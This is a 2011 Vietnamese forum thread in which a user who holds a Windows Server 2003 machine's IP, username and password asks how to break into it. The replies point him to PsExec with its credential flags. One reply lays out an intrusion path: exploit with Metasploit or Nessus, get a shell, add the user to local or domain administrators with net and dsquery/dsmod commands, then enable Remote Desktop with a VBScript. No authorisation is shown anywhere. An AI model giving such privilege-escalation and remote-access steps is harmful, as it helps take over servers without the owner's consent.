[Question] Xâm nhập máy chủ (win 2k3) khi đã có username và password |
14/12/2011 02:30:53 (+0700) | #1 | 251071 |
ivoglent
Member
|
0 |
|
|
Joined: 22/09/2010 09:53:50
Messages: 1
Offline
|
|
Xin chào các bác!
Em có được IP,user và pass của máy chủ. Nhưng không biết cách nào để xâm nhập, khai thác.
Server nay hiện chỉ mở các port 21,22,25,53,80,110. Trong khi user ko nằm trong nhóm dc remote desktop.
Mong các bác cho em ít cao kiến .
Thanks |
|
|
|
|
[Question] Xâm nhập máy chủ (win 2k3) khi đã có username và password |
14/12/2011 06:51:35 (+0700) | #2 | 251075 |
|
tamvunb
Member
|
0 |
|
|
Joined: 22/11/2008 03:57:21
Messages: 65
Offline
|
|
Bạn thử dùng bộ công cụ Pstool xem . |
|
|
|
|
[Question] Xâm nhập máy chủ (win 2k3) khi đã có username và password |
18/12/2011 23:11:07 (+0700) | #3 | 251251 |
djno16868
Member
|
0 |
|
|
Joined: 17/12/2011 10:24:00
Messages: 1
Offline
|
|
cái đó dùng như thế nào vậy bạn |
|
|
|
|
[Question] Xâm nhập máy chủ (win 2k3) khi đã có username và password |
19/12/2011 11:30:35 (+0700) | #4 | 251281 |
|
tamvunb
Member
|
0 |
|
|
Joined: 22/11/2008 03:57:21
Messages: 65
Offline
|
|
http://technet.microsoft.com/en-us/sysinternals/bb896649
Bạn vào trang này họ sẽ giải thích cách dùng Pstool để quản lý server từ xa.
Ví dụ sử dụng PsExec
psexec [\\computer[,computer2[,...] | @file][-u user [-p psswd]][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,... ] cmd [arguments]
Bạn thay các tham số vào.Như bạn thấy ở trên có -u user , -p pass . Sau khi vào thì bạn có thể làm những j mình muốn. |
|
|
|
|
[Question] Xâm nhập máy chủ (win 2k3) khi đã có username và password |
21/12/2011 10:15:21 (+0700) | #5 | 251378 |
|
A.T
Member
|
0 |
|
|
Joined: 11/06/2011 05:45:42
Messages: 76
Offline
|
|
bạn nên khám phá hơn nữa về những lổ hổng đang còn tồn tại trên win2k3 Server và đây là 1 trong những lộ trình của bạn
Bạn ko nói rỏ user này là thuộc local hay thuoc domain
b1.sử dụng Metasploit or Nessus khai thác lổ hổng
b2.chiến shell cmd thử ..
b3.đã có user và pass rồi --> từ shell thăng cấp cho em nó lên làm administrator
t.hop1 : user thuộc local
gõ " net localgroup administrators [user] /add "
t.hop2: user thuoc domain
"dsquery user cn=[user],ou=[name OU],dc=[namedomain],dc=com|dsmod group
cn=administrators,cn=builtin,dc=[namedomain],dc=com -addmbr "
b4.Enable remote desktop trên Server bằng đoạn scrip này nè
Const ENABLE_CONNECTIONS = 1
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}\\" & strComputer & "\root\cimv2"
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_TerminalServiceSetting"
For Each objItem in colItems
errResult = objItem.SetAllowTSConnections(ENABLE_CONNECTIONS)
Next
b5.khi đã remote thành công,user lại là administrator bạn sẻ làm gì tiếp nào
ps : khám thôi đừng " phá " em nhé
|
|
|
|
|
|